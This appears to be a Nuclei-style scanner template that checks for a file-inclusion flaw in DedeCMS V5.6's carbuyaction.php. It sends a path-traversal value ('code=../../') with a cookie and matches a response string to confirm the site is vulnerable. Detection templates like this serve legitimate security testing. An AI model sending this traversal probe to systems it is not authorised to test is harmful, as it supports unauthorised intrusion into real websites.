id: dedecms-carbuyaction-fileinclude info: name: DedeCmsV5.6 Carbuyaction Fileinclude author: pikpikcu severity: high reference: https://www.cnblogs.com/milantgh/p/3615986.html tags: dedecms requests: - method: GET path: - '{{BaseURL}}/plus/carbuyaction.php?dopost=return&code=../../' headers: Cookie: code=cod redirects: true matchers-condition: and matchers: - type: word words: - "Cod::respond()" part: body condition: and - type: status status: - 200